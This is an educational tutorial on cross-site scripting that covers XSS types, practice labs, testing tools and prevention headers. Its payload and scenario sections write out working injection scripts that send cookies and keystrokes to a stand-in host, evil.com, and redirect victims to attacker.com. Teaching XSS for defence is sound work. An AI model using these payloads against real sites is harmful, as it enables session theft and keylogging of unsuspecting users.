Learn Cross-Site Scripting (XSS) from Scratch – Beginner to Expert
🔰 1. Introduction to XSS
✅ What is Cross-Site Scripting (XSS)?
XSS is a web vulnerability that allows attackers to inject malicious scripts into trusted websites.
✅ Why is XSS Dangerous?
It can compromise user data, steal sessions, impersonate users, or even spread malware.
✅ History & Importance
XSS has been consistently ranked in the OWASP Top 10 for web application vulnerabilities due to its impact and prevalence.
✅ Real-World Exploits
-
MySpace worm (Samy)
-
British Airways ticket hijacking
-
eBay phishing redirections
🧪 2. How XSS Works
✅ Browsers render HTML + JavaScript as part of web content
✅ Vulnerable apps do not sanitize user input
✅ Malicious scripts are injected into pages
✅ These scripts then execute in users' browsers
🎯 3. What Can an Attacker Do with XSS?
🔓 Steal Cookies / Sessions
🎭 Impersonate Users
🪝 Phishing Forms
💣 Deliver Malware
🎮 Hijack User Inputs
🧬 4. Types of XSS (With Examples)
🔹 a) Reflected XSS
Occurs via form inputs, URLs, or search parameters
Example:
http://example.com/search?q=<script>alert(1)</script>
🔹 b) Stored XSS
Stored in DB or server logs, executed when data is viewed
Example:
<script>alert('Stored XSS')</script>
🔹 c) DOM-Based XSS
Manipulates the DOM without server interaction
Example:
var name = location.hash.substring(1);
document.getElementById("output").innerHTML = name;
// Input: #<script>alert(1)</script>
🔍 5. Where to Practice XSS (Safe Labs)
| Platform | Purpose |
|---|---|
| DVWA | Beginner-friendly web app |
| bWAPP | Full-feature testbed |
| WebGoat | Official OWASP training app |
| XSS Game | Learn XSS through fun levels |
| PortSwigger Labs | Real-world XSS labs with explanations |
🧰 6. Tools for XSS Testing
🔧 Burp Suite – Intercept & modify requests
⚔️ XSStrike – Advanced automated XSS scanner
🔬 XSS Hunter – Track blind XSS payloads
🧠 HackBar (Firefox/Chrome extension) – Test payloads quickly
📦 OWASP ZAP – Free, full-featured security scanner
💥 7. XSS Payloads (Basic to Advanced)
🧪 Basic:
<script>alert('XSS')</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
🧪 Steal Cookie:
<script>fetch('http://evil.com?cookie='+document.cookie)</script>
🧪 Redirect Victim:
<script>window.location='http://attacker.com'</script>
🧪 Keylogger:
<script>
document.onkeypress=function(e){
fetch('http://evil.com?key='+e.key)}
</script>
📦 Explore more payloads on GitHub:
👉 KIRAN-KUMAR-K3/vulnerability-payload-lists
🚨 8. Real-World Scenario (Example)
A blog allows users to comment without sanitization:
<textarea name="comment"></textarea>
An attacker submits:
<script>new Image().src='http://evil.com?c='+document.cookie</script>
Result: Every user who visits the comment section unknowingly leaks their session.
🛡️ 9. How to Prevent XSS
✅ Developer Best Practices:
-
Sanitize inputs on both client & server
-
Escape HTML entities (
<,>,",', etc.) -
Avoid using
innerHTML,document.write(), or unsafe evals
✅ HTTP Security Headers:
Content-Security-Policy: default-src 'self'
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
✅ Use Secure Frameworks:
-
React – Escapes by default
-
Django – Has built-in XSS protection
-
Ruby on Rails – Auto-escapes outputs
📚 10. Recommended Resources & Payloads
📘 Learning Labs:
🧪 Payload Repository:
🔗 KIRAN-KUMAR-K3/vulnerability-payload-lists on GitHub
🔚 11. Conclusion & Learning Path
✅ XSS is powerful and highly common
✅ Learn the fundamentals before using tools
✅ Practice in legal and controlled environments
✅ Use responsibly to report bugs, not exploit users
✅ Keep contributing to a safer internet
KIRAN KUMAR K
Cybersecurity enthusiast and ethical hacker with expertise in penetration testing, network security, and VAPT. Skilled in identifying vulnerabilities, securing digital systems, and working with Linux and open-source tools. Passionate about IoT security, machine learning for anomaly detection, and cloud security. Always learning and exploring new cybersecurity threats to build safer digital environments. 🚀
